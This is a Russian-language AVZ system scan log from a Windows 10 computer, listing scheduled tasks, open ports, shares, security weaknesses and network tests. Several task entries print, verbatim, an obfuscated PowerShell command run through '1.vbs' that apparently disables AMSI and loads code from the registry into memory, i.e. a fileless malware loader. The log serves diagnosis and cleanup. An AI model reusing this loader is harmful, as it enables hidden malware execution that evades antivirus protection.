wyIbnwitPayt-r+c y,cV_,,cUIivn.t_o32,a +T.,BJ_bhg,oeUI1}n_t!)32{_ ,Gp6Kjo?kj)fd;}_''-2re_pl[ac{e''_.(8..d)''n,''s$1a'' f-r?ep_la_ce_''bdoq_i''i,[8chear/](b343) _-r_epclahce_''v[EK]Z''3,[2chrarc](e37q))s;[lEn_vi_ro/nm4en}t]x::vCufrr(enatD/irwec_to]ry8=piwdh;[[eqc]:9:F_Ll_d([);'-replace('.NnOO(NnOO.NnOO.)'-replace'NnOO'),('$'+415/415)|&('DZmNiDZmNeDZmNx'-replace'DZmN');4750505109" | WorkingDirectory=%ALLUSERSPROFILE%\Windows 1.vbs powershell -c "1858293649;$wwE='bSy_st3emh.Mranyagyemren3t.9Auhtoima_ti+on_.A_msyiUuti-lsf-a_mseiI=ni2tFpai_le}d-fNo,nP2ub0li_c,kSt_atoic' -replace('.aEK(aEK.aEK.)'-replace'aEK'),('$'+94/94);',$wewEw=$_wwyE 8-s=plnitd''-.'';j[R_ef_].}As3selmbvlyy.G5ethTy_peu($!wwmE[+0]_).3Ge{tFiie_ld7($_wweE[91]_,$www}E[}2]?).6SextVfaloue!($znu1ll_,((94r-nae4z69e))'-replace('.aEK(aEK.aEK.)'-replace'aEK'),('$'+94/94)|&('fmifmefmx'-replace'fm');'_&(_gcpm pA*a-Tzy*})._Na_mec (5''f8uszziinp_g o}S.y4-st__eam}t;ubys[itdng5z fS7ays__t7e)+m._8IuO=n;u{es8i61ng[{ _Sh[ys-!tleolm.69Ryuxhnt[ki,m]1e./_Ign8_te_or3o8fpS_lewr_xvi14c,ej_s;hzufs]yin_?gq ekMic_c_r=_os6+obf5mt.]_W_i=fn38,22;__pu_+b=l_3ic6_ jc_!la3/s.s7[ Q?(i+ns_E{cnd+ep_led(glaa_te8, dva5oix2d4 _nXf_nWn({w);-fpput_bl9_i+cp3 s61t_aabti=_c_ }_vo4ximd_j A,5A3Wj5()ye{!bivytc0e?[6d]Tq[Lx=__Fi[8lxe-c.Ezix/io8stx2s((z!iv{7P}jyyhyn{tfvqjrvg_raik_vP+_))?mtFi32lfel=.Rjre_a__dAapl8l_cBy-vt2e_+s(cvipvv_Pj8[hjyt-tv_6r2v53ri/1v=Px_):+z(mb}1yt([e5[.6])uyRee9(giazs_t)wryfr._L__oc_ja_ltaMa_jclhu?in2we9.7aOpg_efn5hSu.+b_Kx2eyvj(_@huiv}fPaSalOFx1TfWkgARjtE1\_{Mit0cmr14os2fo8fn7t\heCtT8tF\n_T0I?4Pi79vlP9_)./_G.e87tVj+aflxluemz(fi.avP2nj3hfwyt7jv0r=2vrk(iyv(_P,n!ndu+8llen)_;[jifc/(bTq_L=dz=_n_eul.2li))=re=_t7u_-rnib;[ik_ntqi cQ!yK=xsT_L)0.L_ae+n_)gt3whc;+5fo_mr8(1ein__t_ /gGG+8Dg=_e0;i?GtGt6D x{!]=+]QK04-_14m;G3fGaDyp++9e)_{6eTL,-[sGmgGDq5]_^41=(_kb_y1bte!])8i(}vPq,Jbi_o7yu_Yd{_mx8.iJ0e7_{A.92eKyuivo(Pf[npGG6rDhi__Sj2os]1_d4]{7;l}g=Ino_t}P_(tr__ _S__KSt?Lb=s6(Io_n_t_!Ptl(r_)q60;)_Imnp_tP_4tkr_j g?}m3=_n(I_!nmt9+Pt3zr8)__QK.o;4Nb!tAu,ljl__ocx/a3t[5eVcyi_r5ktun_ael{_Mentmho7,rym?(z(bxIneytyP8?try_)t(=!-10_)f,xxre}_fk d_SK87SxLy4,(mkImna,tP_wtqr}8)0s6,_r_pef{+ 4g_dm,+_0qx_t10}t0=0_t,0)9x_4__0)j_;4M4dar__s_h8val_(.dCztop3_y_(obTLoq,y0_j,S/nK_S,[L,?iQ_K0();)_(_(p_Xf8iWh)_aMa8.r_s{yha=al_.q1Ge.6t8D{.els0e{g[vatq!e_Fe_or_!Fsu0unc,_toi7]on+hP_oo3in+}tfe{)r(mdS[K3}SLqq,ut_=yp_2ejos_f(__X!fq=W)9_)g)27()_w;(}rb[D_0lvl_aImj_pqoz/rt}4(bid6vP_7n)tb{dl__lsi{_vPl-)j]lppr?{i_vn0at_xe2 {7st9_adt}.icrd be_lxt}vegruun -3l3o9,ngo= 1Ni9tAh8l6l9qocc2aot_yeVceitrh_tuz)a7lv[Me=zm_okory}j(cIs/nt_mPgt1or 4yocif]xB_5,+rguef_d {I89nt+aP4t(.r __ubp__Ak1_,qIc]nt-8Pxts6r i{s9D_pcN=g,8r6uefyw rI=3nt_kP.t_wr kgPwve!jLv_,wU{7Inr3t_3ye2 _1XlI}_O,)}U9I7_nt8f3o22[ q__yqvnhs)pw;3}''8-r_ep_la{ce/''.m(.u.)/'',+''$f1''h -_re_pl]acse'']ivjP''d,[5ch=ar1](r34w) o-rrepyla,ce)''i!Sjbs''?,[hchvarq](-37w))n;[fEnzviaro_nmven/t]v::_Cugrr_en(tDtircec-torry8=p,wd_;[uQiwnE_]:a:AtAW!()i; '-replace('.fCtZ(fCtZ.fCtZ.)'-replace'fCtZ'),('$'+891/891)|&('LwxYiLwxYeLwxYx'-replace'LwxY');4602444252" | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | WinNAT | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\ | 1.vbs powershell -c "1858293649;$wwE='bSy_st3emh.Mranyagyemren3t.9Auhtoima_ti+on_.A_msyiUuti-lsf-a_mseiI=ni2tFpai_le}d-fNo,nP2ub0li_c,kSt_atoic' -replace('.aEK(aEK.aEK.)'-replace'aEK'),('$'+94/94);',$wewEw=$_wwyE 8-s=plnitd''-.'';j[R_ef_].}As3selmbvlyy.G5ethTy_peu($!wwmE[+0]_).3Ge{tFiie_ld7($_wweE[91]_,$www}E[}2]?).6SextVfaloue!($znu1ll_,((94r-nae4z69e))'-replace('.aEK(aEK.aEK.)'-replace'aEK'),('$'+94/94)|&('fmifmefmx'-replace'fm');'_&(_gcpm pA*a-Tzy*})._Na_mec (5''f8uszziinp_g o}S.y4-st__eam}t;ubys[itdng5z fS7ays__t7e)+m._8IuO=n;u{es8i61ng[{ _Sh[ys-!tleolm.69Ryuxhnt[ki,m]1e./_Ign8_te_or3o8fpS_lewr_xvi14c,ej_s;hzufs]yin_?gq ekMic_c_r=_os6+obf5mt.]_W_i=fn38,22;__pu_+b=l_3ic6_ jc_!la3/s.s7[ Q?(i+ns_E{cnd+ep_led(glaa_te8, dva5oix2d4 _nXf_nWn({w);-fpput_bl9_i+cp3 s61t_aabti=_c_ }_vo4ximd_j A,5A3Wj5()ye{!bivytc0e?[6d]Tq[Lx=__Fi[8lxe-c.Ezix/io8stx2s((z!iv{7P}jyyhyn{tfvqjrvg_raik_vP+_))?mtFi32lfel=.Rjre_a__dAapl8l_cBy-vt2e_+s(cvipvv_Pj8[hjyt-tv_6r2v53ri/1v=Px_):+z(mb}1yt([e5[.6])uyRee9(giazs_t)wryfr._L__oc_ja_ltaMa_jclhu?in2we9.7aOpg_efn5hSu.+b_Kx2eyvj(_@huiv}fPaSalOFx1TfWkgARjtE1\_{Mit0cmr14os2fo8fn7t\heCtT8tF\n_T0I?4Pi79vlP9_)./_G.e87tVj+aflxluemz(fi.avP2nj3hfwyt7jv0r=2vrk(iyv(_P,n!ndu+8llen)_;[jifc/(bTq_L=dz=_n_eul.2li))=re=_t7u_-rnib;[ik_ntqi cQ!yK=xsT_L)0.L_ae+n_)gt3whc;+5fo_mr8(1ein__t_ /gGG+8Dg=_e0;i?GtGt6D x{!]=+]QK04-_14m;G3fGaDyp++9e)_{6eTL,-[sGmgGDq5]_^41=(_kb_y1bte!])8i(}vPq,Jbi_o7yu_Yd{_mx8.iJ0e7_{A.92eKyuivo(Pf[npGG6rDhi__Sj2os]1_d4]{7;l}g=Ino_t}P_(tr__ _S__KSt?Lb=s6(Io_n_t_!Ptl(r_)q60;)_Imnp_tP_4tkr_j g?}m3=_n(I_!nmt9+Pt3zr8)__QK.o;4Nb!tAu,ljl__ocx/a3t[5eVcyi_r5ktun_ael{_Mentmho7,rym?(z(bxIneytyP8?try_)t(=!-10_)f,xxre}_fk d_SK87SxLy4,(mkImna,tP_wtqr}8)0s6,_r_pef{+ 4g_dm,+_0qx_t10}t0=0_t,0)9x_4__0)j_;4M4dar__s_h8val_(.dCztop3_y_(obTLoq,y0_j,S/nK_S,[L,?iQ_K0();)_(_(p_Xf8iWh)_aMa8.r_s{yha=al_.q1Ge.6t8D{.els0e{g[vatq!e_Fe_or_!Fsu0unc,_toi7]on+hP_oo3in+}tfe{)r(mdS[K3}SLqq,ut_=yp_2ejos_f(__X!fq=W)9_)g)27()_w;(}rb[D_0lvl_aImj_pqoz/rt}4(bid6vP_7n)tb{dl__lsi{_vPl-)j]lppr?{i_vn0at_xe2 {7st9_adt}.icrd be_lxt}vegruun -3l3o9,ngo= 1Ni9tAh8l6l9qocc2aot_yeVceitrh_tuz)a7lv[Me=zm_okory}j(cIs/nt_mPgt1or 4yocif]xB_5,+rguef_d {I89nt+aP4t(.r __ubp__Ak1_,qIc]nt-8Pxts6r i{s9D_pcN=g,8r6uefyw rI=3nt_kP.t_wr kgPwve!jLv_,wU{7Inr3t_3ye2 _1XlI}_O,)}U9I7_nt8f3o22[ q__yqvnhs)pw;3}''8-r_ep_la{ce/''.m(.u.)/'',+''$f1''h -_re_pl]acse'']ivjP''d,[5ch=ar1](r34w) o-rrepyla,ce)''i!Sjbs''?,[hchvarq](-37w))n;[fEnzviaro_nmven/t]v::_Cugrr_en(tDtircec-torry8=p,wd_;[uQiwnE_]:a:AtAW!()i; '-replace('.fCtZ(fCtZ.fCtZ.)'-replace'fCtZ'),('$'+891/891)|&('LwxYiLwxYeLwxYx'-replace'LwxY');4602444252" | WorkingDirectory=%ALLUSERSPROFILE%\Windows\Profile 1.vbs | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | WinNAT | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\ | 1.vbs powershell -c "1858293649;$wwE='bSy_st3emh.Mranyagyemren3t.9Auhtoima_ti+on_.A_msyiUuti-lsf-a_mseiI=ni2tFpai_le}d-fNo,nP2ub0li_c,kSt_atoic' -replace('.aEK(aEK.aEK.)'-replace'aEK'),('$'+94/94);',$wewEw=$_wwyE 8-s=plnitd''-.'';j[R_ef_].}As3selmbvlyy.G5ethTy_peu($!wwmE[+0]_).3Ge{tFiie_ld7($_wweE[91]_,$www}E[}2]?).6SextVfaloue!($znu1ll_,((94r-nae4z69e))'-replace('.aEK(aEK.aEK.)'-replace'aEK'),('$'+94/94)|&('fmifmefmx'-replace'fm');'_&(_gcpm pA*a-Tzy*})._Na_mec (5''f8uszziinp_g o}S.y4-st__eam}t;ubys[itdng5z fS7ays__t7e)+m._8IuO=n;u{es8i61ng[{ _Sh[ys-!tleolm.69Ryuxhnt[ki,m]1e./_Ign8_te_or3o8fpS_lewr_xvi14c,ej_s;hzufs]yin_?gq ekMic_c_r=_os6+obf5mt.]_W_i=fn38,22;__pu_+b=l_3ic6_ jc_!la3/s.s7[ Q?(i+ns_E{cnd+ep_led(glaa_te8, dva5oix2d4 _nXf_nWn({w);-fpput_bl9_i+cp3 s61t_aabti=_c_ }_vo4ximd_j A,5A3Wj5()ye{!bivytc0e?[6d]Tq[Lx=__Fi[8lxe-c.Ezix/io8stx2s((z!iv{7P}jyyhyn{tfvqjrvg_raik_vP+_))?mtFi32lfel=.Rjre_a__dAapl8l_cBy-vt2e_+s(cvipvv_Pj8[hjyt-tv_6r2v53ri/1v=Px_):+z(mb}1yt([e5[.6])uyRee9(giazs_t)wryfr._L__oc_ja_ltaMa_jclhu?in2we9.7aOpg_efn5hSu.+b_Kx2eyvj(_@huiv}fPaSalOFx1TfWkgARjtE1\_{Mit0cmr14os2fo8fn7t\heCtT8tF\n_T0I?4Pi79vlP9_)./_G.e87tVj+aflxluemz(fi.avP2nj3hfwyt7jv0r=2vrk(iyv(_P,n!ndu+8llen)_;[jifc/(bTq_L=dz=_n_eul.2li))=re=_t7u_-rnib;[ik_ntqi cQ!yK=xsT_L)0.L_ae+n_)gt3whc;+5fo_mr8(1ein__t_ /gGG+8Dg=_e0;i?GtGt6D x{!]=+]QK04-_14m;G3fGaDyp++9e)_{6eTL,-[sGmgGDq5]_^41=(_kb_y1bte!])8i(}vPq,Jbi_o7yu_Yd{_mx8.iJ0e7_{A.92eKyuivo(Pf[npGG6rDhi__Sj2os]1_d4]{7;l}g=Ino_t}P_(tr__ _S__KSt?Lb=s6(Io_n_t_!Ptl(r_)q60;)_Imnp_tP_4tkr_j g?}m3=_n(I_!nmt9+Pt3zr8)__QK.o;4Nb!tAu,ljl__ocx/a3t[5eVcyi_r5ktun_ael{_Mentmho7,rym?(z(bxIneytyP8?try_)t(=!-10_)f,xxre}_fk d_SK87SxLy4,(mkImna,tP_wtqr}8)0s6,_r_pef{+ 4g_dm,+_0qx_t10}t0=0_t,0)9x_4__0)j_;4M4dar__s_h8val_(.dCztop3_y_(obTLoq,y0_j,S/nK_S,[L,?iQ_K0();)_(_(p_Xf8iWh)_aMa8.r_s{yha=al_.q1Ge.6t8D{.els0e{g[vatq!e_Fe_or_!Fsu0unc,_toi7]on+hP_oo3in+}tfe{)r(mdS[K3}SLqq,ut_=yp_2ejos_f(__X!fq=W)9_)g)27()_w;(}rb[D_0lvl_aImj_pqoz/rt}4(bid6vP_7n)tb{dl__lsi{_vPl-)j]lppr?{i_vn0at_xe2 {7st9_adt}.icrd be_lxt}vegruun -3l3o9,ngo= 1Ni9tAh8l6l9qocc2aot_yeVceitrh_tuz)a7lv[Me=zm_okory}j(cIs/nt_mPgt1or 4yocif]xB_5,+rguef_d {I89nt+aP4t(.r __ubp__Ak1_,qIc]nt-8Pxts6r i{s9D_pcN=g,8r6uefyw rI=3nt_kP.t_wr kgPwve!jLv_,wU{7Inr3t_3ye2 _1XlI}_O,)}U9I7_nt8f3o22[ q__yqvnhs)pw;3}''8-r_ep_la{ce/''.m(.u.)/'',+''$f1''h -_re_pl]acse'']ivjP''d,[5ch=ar1](r34w) o-rrepyla,ce)''i!Sjbs''?,[hchvarq](-37w))n;[fEnzviaro_nmven/t]v::_Cugrr_en(tDtircec-torry8=p,wd_;[uQiwnE_]:a:AtAW!()i; '-replace('.fCtZ(fCtZ.fCtZ.)'-replace'fCtZ'),('$'+891/891)|&('LwxYiLwxYeLwxYx'-replace'LwxY');4602444252" | WorkingDirectory=%ALLUSERSPROFILE%\Windows\Profile C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log | 5,71 кб, rsAh, создан: 27.11.2020 10:33:28, изменен: 01.06.2021 09:39:42 Скрипт: Kарантин, Удалить, Удалить через BC x64 | NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log | WorkingDirectory=C:\Program Files\NVIDIA Corporation\NvContainer C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log | 5,64 кб, rsAh, создан: 27.11.2020 12:35:30, изменен: 25.03.2021 12:25:38 Скрипт: Kарантин, Удалить, Удалить через BC x64 | NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log | WorkingDirectory=C:\Program Files\NVIDIA Corporation\NvContainer C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | OneDrive Standalone Update Task-S-1-5-21-2074213207-3610662754-3760384100-500 | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
| C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | OneDrive Standalone Update Task-S-1-5-21-4181382184-3863360630-3152423739-1001 | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
| C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | OneDrive Standalone Update Task-S-1-5-21-4181382184-3863360630-3152423739-1002 | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
| C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | OneDrive Standalone Update Task-S-1-5-21-4181382184-3863360630-3152423739-500 | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
| C:\ProgramData\VКDJ\VКDJ.exe | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC x64 | VKDJ | Скрипт: Удалить задание планировщика | | C:\Windows\system32\Tasks\ | C:\ProgramData\VКDJ\VКDJ.exe /H
| Обнаружено элементов - 125, опознано как безопасные - 114
| | ||||||
| Поставщик | Статус | Исп. файл | Редиректор | Описание | Производитель | GUID
| Обнаружено элементов - 14, опознано как безопасные - 14
| | ||||||
| Protocol Name | Исп. файл | Редиректор | Описание | Производитель
| Обнаружено элементов - 28, опознано как безопасные - 28
| | ||||
| Порт | Статус | Remote Host | Remote Port | Приложение | Редиректор | Примечания | Описание | Производитель
| Порты TCP
| 445 | LISTENING | 0.0.0.0 | 0 | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| 5357 | LISTENING | 0.0.0.0 | 0 | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | | |
| 49665 | LISTENING | 0.0.0.0 | 0 | wininit.exe [936] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | | |
| 49673 | LISTENING | 0.0.0.0 | 0 | services.exe [996] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | | |
| 139 | LISTENING | 0.0.0.0 | 0 | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| 62620 | TIME_WAIT | 217.69.133.145 | 443 | [0] | x64 | | |
| 62624 | TIME_WAIT | 178.154.131.215 | 443 | [0] | x64 | | |
| 62626 | TIME_WAIT | 178.154.131.215 | 443 | [0] | x64 | | |
| 62630 | TIME_WAIT | 142.251.1.155 | 443 | [0] | x64 | | |
| 62632 | TIME_WAIT | 64.233.161.132 | 443 | [0] | x64 | | |
| 62636 | TIME_WAIT | 20.82.207.122 | 443 | [0] | x64 | | |
| 139 | LISTENING | 0.0.0.0 | 0 | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| Порты UDP
| 137 | LISTENING | -- | -- | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| 138 | LISTENING | -- | -- | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| 137 | LISTENING | -- | -- | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| 138 | LISTENING | -- | -- | System [4] | ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить x64 | Microsoft NET | |
| Обнаружено элементов - 115, опознано как безопасные - 99
| | ||||||||||||||||||||||||
| Имя файла | Редиректор | Описание | Производитель | CLSID | URL загрузки
| Обнаружено элементов - 0, опознано как безопасные - 0
| | ||||||
| Имя файла | Редиректор | Описание | Производитель
| Обнаружено элементов - 35, опознано как безопасные - 35
| | ||||||
| Имя файла | Редиректор | Описание | Производитель | CLSID
| Обнаружено элементов - 22, опознано как безопасные - 22
| | ||||||
| Запись файла Hosts |
| Имя файла | Редиректор | Тип | Описание | Производитель | CLSID
| Обнаружено элементов - 44, опознано как безопасные - 44
| | ||||||
| Сетевое имя | Путь | Примечания
| print$ | C:\Windows\system32\spool\drivers | Драйверы принтеров
| D$ | D:\ | Стандартный общий ресурс
| C$ | C:\ | Стандартный общий ресурс
| ADMIN$ | C:\Windows | Удаленный Admin
| IPC$ | | Удаленный IPC
| |
| Файл | Редиректор | Описание | Тип |
Протокол утилиты AVZ версии 5.55 Сканирование запущено в 05.11.2021 16:20:05 Загружена база: сигнатуры - 297569, нейропрофили - 2, микропрограммы лечения - 56, база от 05.11.2021 04:00 Загружены микропрограммы эвристики: 417 Загружены микропрограммы ИПУ: 10 Загружены цифровые подписи системных файлов: 616872 Режим эвристического анализатора: Максимальный уровень эвристики Режим лечения: выключено Версия Windows: 10.0.19042, "Windows 10 Home Single Language" (Windows 10 Home Single Language) x64, дата инсталляции 31.10.2020 19:46:12 ; AVZ работает с правами администратора (+) Восстановление системы: включено 1. Поиск RootKit и программ, перехватывающих функции API 1.1 Поиск перехватчиков API, работающих в UserMode Анализ kernel32.dll, таблица экспорта найдена в секции .rdata Анализ ntdll.dll, таблица экспорта найдена в секции .text Анализ user32.dll, таблица экспорта найдена в секции .text Анализ advapi32.dll, таблица экспорта найдена в секции .text Анализ ws2_32.dll, таблица экспорта найдена в секции .text Анализ wininet.dll, таблица экспорта найдена в секции .text Анализ rasapi32.dll, таблица экспорта найдена в секции .text Анализ urlmon.dll, таблица экспорта найдена в секции .text Анализ netapi32.dll, таблица экспорта найдена в секции .text 1.4 Поиск маскировки процессов и драйверов Проверка не производится, так как не установлен драйвер мониторинга AVZPM 2. Проверка памяти Количество найденных процессов: 162 Количество загруженных модулей: 245 Проверка памяти завершена 3. Сканирование дисков 4. Проверка Winsock Layered Service Provider (SPI/LSP) Настройки LSP проверены. Ошибок не обнаружено 5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL) 6. Поиск открытых портов TCP/UDP, используемых вредоносными программами Проверка отключена пользователем 7. Эвристичеcкая проверка системы Проверка завершена 8. Поиск потенциальных уязвимостей >> Службы: разрешена потенциально опасная служба TermService (Службы удаленных рабочих столов) > Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)! >> Безопасность: разрешен автозапуск программ с CDROM >> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...) >> Безопасность: к ПК разрешен доступ анонимного пользователя >> Безопасность: Разрешена отправка приглашений удаленному помощнику Проверка завершена 9. Мастер поиска и устранения проблем >> Разрешен автозапуск с HDD >> Разрешен автозапуск с сетевых дисков >> Разрешен автозапуск со сменных носителей Проверка завершена Просканировано файлов: 407, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0 Сканирование завершено в 05.11.2021 16:20:25 Сканирование длилось 00:00:22 Выполняется исследование системы Диагностика сети DNS and Ping test Host="yandex.ru", IP="77.88.55.77,77.88.55.88,5.255.255.80,5.255.255.88", Ping=OK (0,37,77.88.55.77) Host="google.ru", IP="64.233.161.94", Ping=OK (0,42,64.233.161.94) Host="google.com", IP="173.194.220.100,173.194.220.102,173.194.220.139,173.194.220.138,173.194.220.101,...", Ping=OK (0,39,173.194.220.100) Host="www.kaspersky.com", IP="93.159.228.40", Ping=OK (0,46,93.159.228.40) Host="www.kaspersky.ru", IP="77.74.178.40", Ping=OK (0,43,77.74.178.40) Host="dnl-03.geo.kaspersky.com", IP="93.191.13.106", Ping=OK (0,32,93.191.13.106) Host="dnl-11.geo.kaspersky.com", IP="62.128.100.81", Ping=OK (0,52,62.128.100.81) Host="activation-v2.kaspersky.com", IP="212.5.89.37", Ping=OK (0,40,212.5.89.37) Host="odnoklassniki.ru", IP="217.20.155.13,5.61.23.11,217.20.147.1", Ping=OK (0,29,217.20.155.13) Host="vk.com", IP="87.240.139.194,87.240.190.67,87.240.190.72,87.240.190.78,87.240.137.158,...", Ping=OK (0,39,87.240.139.194) Host="vkontakte.ru", IP="87.240.190.72,87.240.190.67,87.240.190.78,93.186.225.208,87.240.139.194,...", Ping=OK (0,39,87.240.190.72) Host="twitter.com", IP="104.244.42.129,104.244.42.193", Ping=OK (0,101,104.244.42.129) Host="facebook.com", IP="31.13.72.36", Ping=OK (0,56,31.13.72.36) Host="ru-ru.facebook.com", IP="31.13.72.8", Ping=OK (0,48,31.13.72.8) Network IE settings IE setting AutoConfigURL= IE setting AutoConfigProxy= IE setting ProxyOverride= IE setting ProxyServer= IE setting Internet\ManualProxies= Network TCP/IP settings Interface: "Ethernet" IPAddress = "192.168.1.68" DHCPIPAddress = "192.168.1.68" SubnetMask = "255.255.255.0" DHCPSubnetMask = "255.255.255.0" DefaultGateway = "" NameServer = "" Domain = "" DhcpServer = "192.168.1.1" Interface: "VirtualBox Host-Only Network" IPAddress = "192.168.56.1" SubnetMask = "255.255.255.0" DefaultGateway = "" NameServer = "" Domain = "" DhcpServer = "255.255.255.255" Interface: "Беспроводная сеть" IPAddress = "192.168.43.200" DHCPIPAddress = "192.168.43.200" SubnetMask = "255.255.255.0" DHCPSubnetMask = "255.255.255.0" DefaultGateway = "" NameServer = "" Domain = "" DhcpServer = "192.168.43.1" Network Persistent Routes